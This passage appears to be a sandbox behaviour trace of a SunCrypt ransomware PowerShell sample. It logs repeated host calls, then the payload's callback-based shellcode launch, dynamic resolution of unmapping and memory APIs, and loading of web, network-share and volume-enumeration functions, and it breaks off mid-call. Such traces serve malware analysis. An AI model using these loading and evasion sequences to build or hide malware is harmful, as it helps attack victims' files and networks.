lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701747715354) returned 1 [0104.661] EtwEventActivityIdControl () returned 0x0 [0104.661] EtwEventActivityIdControl () returned 0x0 [0104.661] EtwEventActivityIdControl () returned 0x0 [0104.661] EtwEventActivityIdControl () returned 0x0 [0104.661] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x82e41769, Data2=0xfb6f, Data3=0x47cd, Data4=([0]=0xaa, [1]=0x98, [2]=0x2c, [3]=0xc7, [4]=0x95, [5]=0x8, [6]=0xba, [7]=0x46))) returned 0x0 [0104.662] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.662] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701747859553) returned 1 [0104.662] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.662] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.662] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.662] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.663] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.663] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.665] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701748139380) returned 1 [0104.665] EtwEventActivityIdControl () returned 0x0 [0104.665] EtwEventActivityIdControl () returned 0x0 [0104.665] EtwEventActivityIdControl () returned 0x0 [0104.665] EtwEventActivityIdControl () returned 0x0 [0104.665] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x96970b82, Data2=0xb44c, Data3=0x4341, Data4=([0]=0xa2, [1]=0xd6, [2]=0x45, [3]=0x89, [4]=0x22, [5]=0xdd, [6]=0x5b, [7]=0xac))) returned 0x0 [0104.666] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.666] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701748300737) returned 1 [0104.666] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.667] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.667] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.667] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.667] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.667] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.667] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.675] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701749156744) returned 1 [0104.675] EtwEventActivityIdControl () returned 0x0 [0104.675] EtwEventActivityIdControl () returned 0x0 [0104.675] EtwEventActivityIdControl () returned 0x0 [0104.675] EtwEventActivityIdControl () returned 0x0 [0104.675] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xcd9a6a9e, Data2=0x567, Data3=0x467b, Data4=([0]=0x87, [1]=0xdf, [2]=0xa8, [3]=0x36, [4]=0xee, [5]=0xba, [6]=0x38, [7]=0x5f))) returned 0x0 [0104.676] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.676] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701749295744) returned 1 [0104.676] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.677] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.677] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.677] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.677] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.677] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.677] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.682] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701749859051) returned 1 [0104.682] EtwEventActivityIdControl () returned 0x0 [0104.682] EtwEventActivityIdControl () returned 0x0 [0104.682] EtwEventActivityIdControl () returned 0x0 [0104.682] EtwEventActivityIdControl () returned 0x0 [0104.682] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xbf32bf19, Data2=0xba73, Data3=0x407f, Data4=([0]=0xb5, [1]=0x20, [2]=0x52, [3]=0xec, [4]=0x41, [5]=0xcf, [6]=0x3b, [7]=0xdd))) returned 0x0 [0104.683] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.683] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701749982598) returned 1 [0104.683] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.683] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.683] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.684] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.684] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.684] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.684] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.685] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701750203847) returned 1 [0104.686] EtwEventActivityIdControl () returned 0x0 [0104.686] EtwEventActivityIdControl () returned 0x0 [0104.686] EtwEventActivityIdControl () returned 0x0 [0104.686] EtwEventActivityIdControl () returned 0x0 [0104.686] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x49d722de, Data2=0xe1a1, Data3=0x45a3, Data4=([0]=0x83, [1]=0x61, [2]=0x9f, [3]=0xfb, [4]=0xbe, [5]=0x92, [6]=0xf2, [7]=0xa3))) returned 0x0 [0104.686] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.687] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701750325616) returned 1 [0104.687] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.687] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.687] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.687] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.687] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.692] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701750910095) returned 1 [0104.693] EtwEventActivityIdControl () returned 0x0 [0104.693] EtwEventActivityIdControl () returned 0x0 [0104.693] EtwEventActivityIdControl () returned 0x0 [0104.693] EtwEventActivityIdControl () returned 0x0 [0104.693] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x2a6f8775, Data2=0x8d76, Data3=0x49cb, Data4=([0]=0xbf, [1]=0xd4, [2]=0xc3, [3]=0xef, [4]=0x3b, [5]=0x7c, [6]=0x52, [7]=0x8b))) returned 0x0 [0104.694] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.694] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701751370258) returned 1 [0104.697] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.697] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.697] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.697] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.698] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.698] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.698] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.700] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701751679305) returned 1 [0104.700] EtwEventActivityIdControl () returned 0x0 [0104.700] EtwEventActivityIdControl () returned 0x0 [0104.700] EtwEventActivityIdControl () returned 0x0 [0104.701] EtwEventActivityIdControl () returned 0x0 [0104.701] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x7d9be5af, Data2=0xc250, Data3=0x4924, Data4=([0]=0x94, [1]=0x15, [2]=0xa1, [3]=0x6a, [4]=0x11, [5]=0x59, [6]=0x5, [7]=0xe7))) returned 0x0 [0104.701] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.702] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701751841166) returned 1 [0104.702] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.702] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.702] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.702] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.702] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.705] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701752158794) returned 1 [0104.705] EtwEventActivityIdControl () returned 0x0 [0104.705] EtwEventActivityIdControl () returned 0x0 [0104.705] EtwEventActivityIdControl () returned 0x0 [0104.705] EtwEventActivityIdControl () returned 0x0 [0104.787] EnumDesktopsW (hwinsta=0x0, lpEnumFunc=0x41e0000, lParam=0x44d0000) [0104.789] GetProcAddress (hModule=0x76040000, lpProcName="GetModuleHandleA") returned 0x7608d9f3 [0104.790] GetModuleHandleA (lpModuleName=0x0) returned 0xd80000 [0104.790] GetProcAddress (hModule=0x76040000, lpProcName="VirtualQuery") returned 0x76096d4f [0104.790] GetProcAddress (hModule=0x76040000, lpProcName="VirtualAlloc") returned 0x7608c53a [0104.790] GetProcAddress (hModule=0x76040000, lpProcName="GetCurrentProcess") returned 0x7608d8a0 [0104.790] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x776d0000 [0104.791] GetProcAddress (hModule=0x776d0000, lpProcName="ZwUnmapViewOfSection") returned 0x777169b8 [0104.791] VirtualQuery (in: lpAddress=0xd80000, lpBuffer=0x4ebece4, dwLength=0x1c | out: lpBuffer=0x4ebece4*(BaseAddress=0xd80000, AllocationBase=0xd80000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0104.791] VirtualQuery (in: lpAddress=0xd81000, lpBuffer=0x4ebece4, dwLength=0x1c | out: lpBuffer=0x4ebece4*(BaseAddress=0xd81000, AllocationBase=0xd80000, AllocationProtect=0x80, RegionSize=0xe000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0104.791] VirtualQuery (in: lpAddress=0xd8f000, lpBuffer=0x4ebece4, dwLength=0x1c | out: lpBuffer=0x4ebece4*(BaseAddress=0xd8f000, AllocationBase=0xd80000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x1000000)) returned 0x1c [0104.791] VirtualQuery (in: lpAddress=0xd90000, lpBuffer=0x4ebece4, dwLength=0x1c | out: lpBuffer=0x4ebece4*(BaseAddress=0xd90000, AllocationBase=0xd80000, AllocationProtect=0x80, RegionSize=0x5b000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0104.791] VirtualQuery (in: lpAddress=0xdeb000, lpBuffer=0x4ebece4, dwLength=0x1c | out: lpBuffer=0x4ebece4*(BaseAddress=0xdeb000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x5000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0104.791] VirtualAlloc (lpAddress=0x400000, dwSize=0x14001, flAllocationType=0x3000, flProtect=0x4) returned 0x0 [0104.791] VirtualAlloc (lpAddress=0x0, dwSize=0x14001, flAllocationType=0x3000, flProtect=0x4) returned 0x44f0000 [0104.793] LoadLibraryA (lpLibFileName="Secur32.dll") returned 0x75720000 [0104.794] GetProcAddress (hModule=0x75720000, lpProcName="GetUserNameExA") returned 0x75749cc9 [0104.794] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x765e0000 [0106.676] GetProcAddress (hModule=0x765e0000, lpProcName="InternetReadFile") returned 0x765fb406 [0106.676] GetProcAddress (hModule=0x765e0000, lpProcName="HttpOpenRequestA") returned 0x76604c7d [0106.676] GetProcAddress (hModule=0x765e0000, lpProcName="InternetCloseHandle") returned 0x765fab49 [0106.677] GetProcAddress (hModule=0x765e0000, lpProcName="InternetOpenA") returned 0x7660f18e [0106.677] GetProcAddress (hModule=0x765e0000, lpProcName="HttpQueryInfoA") returned 0x765fa33e [0106.677] GetProcAddress (hModule=0x765e0000, lpProcName="HttpSendRequestA") returned 0x766718f8 [0106.677] GetProcAddress (hModule=0x765e0000, lpProcName="InternetConnectA") returned 0x766049e9 [0106.678] GetProcAddress (hModule=0x765e0000, lpProcName="InternetCrackUrlA") returned 0x765ed075 [0106.678] GetProcAddress (hModule=0x765e0000, lpProcName="HttpAddRequestHeadersA") returned 0x765fdcd2 [0106.678] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x75fa0000 [0106.678] GetProcAddress (hModule=0x75fa0000, lpProcName="wnsprintfW") returned 0x75fcef87 [0106.679] GetProcAddress (hModule=0x75fa0000, lpProcName="PathFindExtensionW") returned 0x75fba1b9 [0106.679] GetProcAddress (hModule=0x75fa0000, lpProcName="wnsprintfA") returned 0x75fcedae [0106.679] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x725c0000 [0106.825] GetProcAddress (hModule=0x725c0000, lpProcName="WNetCloseEnum") returned 0x725c2dd6 [0106.825] GetProcAddress (hModule=0x725c0000, lpProcName="WNetEnumResourceW") returned 0x725c3058 [0106.826] GetProcAddress (hModule=0x725c0000, lpProcName="WNetOpenEnumW") returned 0x725c2f06 [0106.826] GetProcAddress (hModule=0x725c0000, lpProcName="WNetGetConnectionW") returned 0x725c42d7 [0106.827] GetProcAddress (hModule=0x725c0000, lpProcName="WNetAddConnection2W") returned 0x725c4744 [0106.827] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76040000 [0106.828] GetProcAddress (hModule=0x76040000, lpProcName="ExitProcess") returned 0x7609bd12 [0106.828] GetProcAddress (hModule=0x76040000, lpProcName="GetLastError") returned 0x7608cee0 [0106.828] GetProcAddress (hModule=0x76040000, lpProcName="AllocConsole") returned 0x760ecc2d [0106.829] GetProcAddress (hModule=0x76040000, lpProcName="GetCurrentProcess") returned 0x7608d8a0 [0106.829] GetProcAddress (hModule=0x76040000, lpProcName="GetVolumePathNamesForVolumeNameW") returned 0x7607c071 [0106.829] GetProcAddress (hModule=0x76040000, lpProcName="SetVolumeMountPointW") returned 0x760d5f88 [0106.830] GetProcAddress (hModule=0x76040000, lpProcName="FindVolumeClose") returned 0x76072d86 [0106.830] GetProcAddress (hModule=0x76040000, lpProcName="FindNextVolumeW") returned 0x76072999 [0106.830] GetProcAddress (hModule=0x76040000, lpProcName="FindFirstVolumeW") returned 0x76072c45 [0106.830] GetProcAddress (hModule=0x76040000, lpProcName="GetVersionExW") returned 0x76089af9 [0106.831] GetProcAddress (hModule=0x76040000, lpProcName="GetComputerNameExA") returned 0x760d0177 [0106.831] GetProcAddress (hModule=0x76040000, lpProcName="GetCommandLineW") returned 0x76095414 [0106.831] GetProcAddress (hModule=0x76040000, lpProcName="GetModuleHandleA") returned 0x7608d9f3 [0106.832] GetProcAddress (hModule=0x76040000, lpProcName="CreateMutexA") returned 0x7608d8d4 [0106.832] GetProcAddress (hModule=0x76040000, lpProcName="LocalFree") returned 0x7608ccfc [0106.832] GetProcAddress (hModule=0x76040000, lpProcName="FindNextFileW") returned 0x76089ca6 [0106.833] GetProcAddress (hModule=0x76040000, lpProcName="FindFirstFileW") returned 0x7609415c [0106.833] GetProcAddress (hModule=0x76040000, lpProcName="CreateFileW") returned 0x7608e9a9 [0106.833] GetProcAddress (hModule=0x76040000, lpProcName="GetDriveTypeW") returned 0x7608ee42 [0106.833] GetProcAddress (hModule=0x76040000, lpProcName="lstrlenW") returned 0x7608bef8 [0106.834] GetProcAddress (hModule=0x76040000, lpProcName="InterlockedIncrement") returned 0x7608c4b0 [0106.834] GetProcAddress (hModule=0x76040000, lpProcName="InterlockedCompareExchange64") returned 0x77705b1c [0106.834] GetProcAddress (hModule=0x76040000, 